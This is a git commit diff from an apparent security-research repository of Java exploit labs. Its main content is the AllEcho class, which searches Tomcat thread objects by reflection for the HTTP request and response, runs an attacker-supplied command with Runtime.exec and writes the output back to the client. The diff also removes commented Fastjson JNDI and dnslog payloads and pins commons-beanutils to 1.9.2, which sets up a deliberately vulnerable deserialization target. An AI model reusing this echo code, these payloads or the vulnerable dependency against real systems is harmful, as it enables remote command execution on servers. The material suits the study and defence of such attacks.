echo/Controller/Fastjson.java

SummerSec · SummerSec · commit 8200f77b5a1b · 2021-07-13T12:40:55.000+08:00
diff --git a/Rce_Echo/TomcatEcho/src/main/java/summersec/echo/Controller/AllEcho.java b/Rce_Echo/TomcatEcho/src/main/java/summersec/echo/Controller/AllEcho.java
@@ -2,36 +2,29 @@
 //Author:fnmsd
 //Blog:https://blog.csdn.net/fnmsd
 
-import java.io.PrintWriter;
-import java.lang.reflect.Field;
-import java.lang.reflect.InvocationTargetException;
-import java.lang.reflect.Method;
-import java.util.HashSet;
-import java.util.Scanner;
+public class AllEcho {
 
-public class dfs_classloader {
-
-    static HashSet<Object> h;
-    static ClassLoader cl = Thread.currentThread().getContextClassLoader();
+    static java.util.HashSet<Object> h;
+    static ClassLoader cl = java.lang.Thread.currentThread().getContextClassLoader();
     static Class hsr;//HTTPServletRequest.class
     static Class hsp;//HTTPServletResponse.class
     static String cmd;
     static Object r;
     static Object p;
 
-    public dfs_classloader() {
+    public AllEcho() {
 
         r = null;
         p = null;
-        h =new HashSet<Object>();
+        h =new java.util.HashSet<Object>();
         try {
             hsr = cl.loadClass("javax.servlet.http.HttpServletRequest");
             hsp = cl.loadClass("javax.servlet.http.HttpServletResponse");
         } catch (ClassNotFoundException e) {
             e.printStackTrace();
         }
 
-        F(Thread.currentThread(),0);
+        F(java.lang.Thread.currentThread(),0);
     }
 
     private static boolean i(Object obj){
@@ -57,7 +50,7 @@ private static void p(Object o, int depth){
                     }else{
                         //System.out.println("find Request");
                         try {
-                            Method getResponse = r.getClass().getMethod("getResponse");
+                            java.lang.reflect.Method getResponse = r.getClass().getMethod("getResponse");
                             p = getResponse.invoke(r);
                         } catch (Exception e) {
                             //System.out.println("getResponse Error");
@@ -67,7 +60,7 @@ private static void p(Object o, int depth){
                     }
                 } catch (IllegalAccessException e) {
                     e.printStackTrace();
-                } catch (InvocationTargetException e) {
+                } catch (java.lang.reflect.InvocationTargetException e) {
                     e.printStackTrace();
                 } catch (NoSuchMethodException e) {
                     e.printStackTrace();
@@ -80,8 +73,9 @@ private static void p(Object o, int depth){
             }
             if(r !=null&& p !=null){
                 try {
-                    PrintWriter pw =  (PrintWriter)hsp.getMethod("getWriter").invoke(p);
-                    pw.println(new Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next());
+                    String charsetName = System.getProperty("os.name").toLowerCase().contains("window") ? "GBK":"UTF-8";
+                    java.io.PrintWriter pw =  (java.io.PrintWriter)hsp.getMethod("getWriter").invoke(p);
+                    pw.println(new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream(),charsetName).useDelimiter("\\A").next());
                     pw.flush();
                     pw.close();
                     //p.addHeader("out",new Scanner(Runtime.getRuntime().exec(r.getHeader("cmd")).getInputStream()).useDelimiter("\\A").next());
@@ -97,7 +91,7 @@ private static void F(Object start, int depth){
 
         Class n=start.getClass();
         do{
-            for (Field declaredField : n.getDeclaredFields()) {
+            for (java.lang.reflect.Field declaredField : n.getDeclaredFields()) {
                 declaredField.setAccessible(true);
                 Object o = null;
                 try{
diff --git a/Rce_Echo/TomcatEcho/src/main/java/summersec/echo/Controller/Fastjson.java b/Rce_Echo/TomcatEcho/src/main/java/summersec/echo/Controller/Fastjson.java
@@ -78,17 +78,6 @@ public static void main(String[] args) {
         System.out.println(ob.getClass().getName());
     }
 
-//    {"@type":"java.net.Inet4Address","val":"cr8s2f.dnslog.cn"}
-//{
-//    "a":{
-//    "@type":"java.lang.Class",
-//            "val":"com.sun.rowset.JdbcRowSetImpl"
-//},
-//    "b":{
-//    "@type":"com.sun.rowset.JdbcRowSetImpl",
-//            "dataSourceName":"ldap://127.0.0.1:6666/Test",
-//            "autoCommit":"true"
-//}
-//}
+
 
 }
diff --git a/shiro/shiro-deser/pom.xml b/shiro/shiro-deser/pom.xml
@@ -75,11 +75,11 @@
         </dependency>
 
         <!-- https://mvnrepository.com/artifact/commons-beanutils/commons-beanutils -->
-<!--        <dependency>-->
-<!--            <groupId>commons-beanutils</groupId>-->
-<!--            <artifactId>commons-beanutils</artifactId>-->
-<!--            <version>1.9.4</version>-->
-<!--        </dependency>-->
+        <dependency>
+            <groupId>commons-beanutils</groupId>
+            <artifactId>commons-beanutils</artifactId>
+            <version>1.9.2</version>
+        </dependency>
         <dependency>
             <groupId>org.apache.commons</groupId>
             <artifactId>commons-lang3</artifactId>
diff --git a/shiro/shiro-deser/target/classes/META-INF/shiro-deser.kotlin_module b/shiro/shiro-deser/target/classes/META-INF/shiro-deser.kotlin_module
